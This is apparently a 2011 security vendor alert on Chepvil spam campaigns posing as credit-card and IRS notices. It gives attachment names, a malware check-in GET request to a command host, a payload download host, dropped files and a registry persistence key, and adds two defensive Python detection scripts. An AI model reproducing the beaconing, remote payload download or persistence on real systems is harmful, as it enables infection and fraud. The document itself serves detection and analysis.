Fake Credit Card and IRS notices (June 30, 2011)

The SonicWALL UTM Research team observed two new spam campaigns in the past few days that pretend to contain notices from a credit card company or the Internal Revenue Service (IRS). The e-mails carry the downloader Trojan Chepvil as an attachment. Chepvil silently downloads and installs additional malware components or other malware, including Rogue AV. SonicWALL has received more than 100,000 copies of e-mails from these spam campaigns so far, delivering 74 unique malicious binaries, and the campaigns were still active at the time of writing.

Campaign #1 – Credit Card Overdue notice spam

Subject:

  • Credit Card Overdue

Attachment: Customer details.zip (contains Customer details.exe)

The e-mail message looks like below:

[screenshot: Credit Card Overdue e-mail]

Campaign #2 – IRS notification spam

Subject:

  • IRS notification

Attachment: IRS document.zip (contains IRS document.exe)

The e-mail message looks like below:

[screenshot: IRS notification e-mail]

The executable file inside the zip attachment uses an icon disguised as an Acrobat Reader PDF file:

[screenshot: attachment icon]
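Both campaigns rely on the same lure: a .zip whose only member is a Windows executable named like a document. The following Python script is an added example (not SonicWALL's code or tooling) showing how a mail gateway or analyst script can screen such attachments. It flags archive members by executable extension and, independently, by the "MZ" file header, so a renamed binary is still caught; the sample archive is constructed in memory and the "executable" inside it is only a two-byte MZ stub.

```python
"""Screen a zipped e-mail attachment for executables posing as documents.

Added example, not SonicWALL's code. The archive and its members are
constructed here for the demonstration.
"""
import io
import os
import zipfile

# Extensions Windows will run directly when the user double-clicks.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}


def is_pe_image(head: bytes) -> bool:
    """True if the bytes begin with the DOS 'MZ' header of a Windows executable."""
    return head[:2] == b"MZ"


def suspicious_members(zip_bytes: bytes) -> list:
    """Return names of archive members that are, or look like, executables.

    Checks both the file extension and the first two bytes of content, so
    renaming 'Customer details.exe' to 'Customer details.pdf' does not evade
    the check.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = os.path.splitext(info.filename)[1].lower()
            with zf.open(info) as member:
                head = member.read(2)
            if ext in EXECUTABLE_EXTENSIONS or is_pe_image(head):
                findings.append(info.filename)
    return findings


def build_sample_zip(member_name: str, payload: bytes) -> bytes:
    """Construct a small in-memory .zip containing one member (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample mimicking the IRS campaign's attachment name. The
    # payload is an MZ header followed by padding, not a real program.
    sample = build_sample_zip("IRS document.exe", b"MZ" + b"\x00" * 62)
    print(suspicious_members(sample))   # ['IRS document.exe']
    benign = build_sample_zip("invoice.txt", b"plain text")
    print(suspicious_members(benign))   # []
```

In production the header check matters more than the extension list: attackers rotate extensions, but a PE file must start with "MZ" to run.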

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

  • Creates a process SVCHOST.EXE and injects code into it.
  • Deletes the original copy of the file.
  • Reports the infected machine by sending the following GET request:
    GET /404.php?type=stats&affid=531&subid=01&awok HTTP/1.1
    User-Agent: IE
    Host: click(REMOVED).org
  • Downloads Fake AV Trojan from a remote server mysteryforyou1.ru to the following location and executes it:
    • (Application Data)\dRBAHQLTbF.exe – [ detected as GAV: FakeAV.PSL (Trojan) ]

  • The Fake AV Trojan periodically moves all of the user's programs into (TEMP)\smtmp(N) [where N = 1, 2, 3, ...], making them unavailable to the user, and also hides the user's files. Commands and features found in the analysis are shown below:

    [screenshot: commands and features]

    Languages supported:

    [screenshot: supported languages]

    More details about this Fake AV Trojan's functionality can be found in one of our previous sonicalerts: Fake Desktop Utilities on the rise (June 8, 2011)

  • Other dropped files include:
    • (TEMP)\trol.exe – [ detected as GAV: Agent.SEO (Trojan) ]
    • (TEMP)\javaw.exe – [ detected as GAV: Suspicious#polycrypt.4_2 (Worm) ]
  • Registry modification to ensure Fake AV runs upon system reboot:
    • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Run
      Value: dRBAHQLTbF
      Data: (Application Data)\dRBAHQLTbF.exe
  • SonicWALL Gateway AntiVirus proactively blocks the spammed Downloader Trojan Chepvil via the following signature:

    • GAV: Suspicious#Chepvil.K (Trojan)

    [screenshot: GAV signature]
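The check-in request above is a usable network indicator: a GET to /404.php with the query keys type=stats, affid and subid, and a bare User-Agent of "IE". The Python script below is an added example (not SonicWALL's code) of turning it into a proxy-log detection. It matches on the combination of path, query keys and user agent rather than any single field, since /404.php on its own is a common page name. The log format, the IP addresses and the hosts other than the page's redacted "click(REMOVED).org" are constructed for the demonstration; parse_line() is where a real deployment would adapt to its proxy's format.

```python
"""Flag Chepvil-style check-in requests in web proxy logs.

Added example, not SonicWALL's code. Log format and sample lines are
constructed; the indicator (path, query keys, User-Agent) comes from the
request shown in the alert.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log format:
#   <time> <client_ip> <method> <host> <path_and_query> "<user_agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<host>\S+) '
    r'(?P<url>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample log: lines 1 and 3 are check-ins, lines 2 and 4 are benign.
SAMPLE_LOG = """\
2011-06-30T10:01:02Z 10.0.0.15 GET click(REMOVED).org /404.php?type=stats&affid=531&subid=01&awok "IE"
2011-06-30T10:01:05Z 10.0.0.15 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 6.1)"
2011-06-30T10:02:17Z 10.0.0.22 GET cdn.example.net /404.php?type=stats&affid=777&subid=03&awok "IE"
2011-06-30T10:03:44Z 10.0.0.31 GET www.example.org /404.php "Mozilla/5.0"
"""


def parse_line(line: str):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_chepvil_checkin(rec: dict) -> bool:
    """True when path, query keys and User-Agent all match the indicator."""
    parts = urlsplit(rec["url"])
    if parts.path != "/404.php":
        return False
    # keep_blank_values so the valueless 'awok' key is retained (not required here)
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("type") != ["stats"] or "affid" not in q or "subid" not in q:
        return False
    return rec["ua"].strip() == "IE"


def find_checkins(log_text: str) -> list:
    """Return (client_ip, host, affid) for every matching line, in log order.

    The affid value identifies the distribution affiliate and is worth
    keeping for clustering infections across hosts.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_chepvil_checkin(rec):
            affid = parse_qs(urlsplit(rec["url"]).query).get("affid", ["?"])[0]
            hits.append((rec["src"], rec["host"], affid))
    return hits


if __name__ == "__main__":
    for src, host, affid in find_checkins(SAMPLE_LOG):
        print(f"possible Chepvil check-in from {src} to {host} (affid={affid})")
```

Because the downloader deletes its own file and runs from an injected SVCHOST.EXE, this outbound beacon is often the earliest host-independent signal an infection produces, and the affid/subid pair lets a responder group machines hit by the same affiliate.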
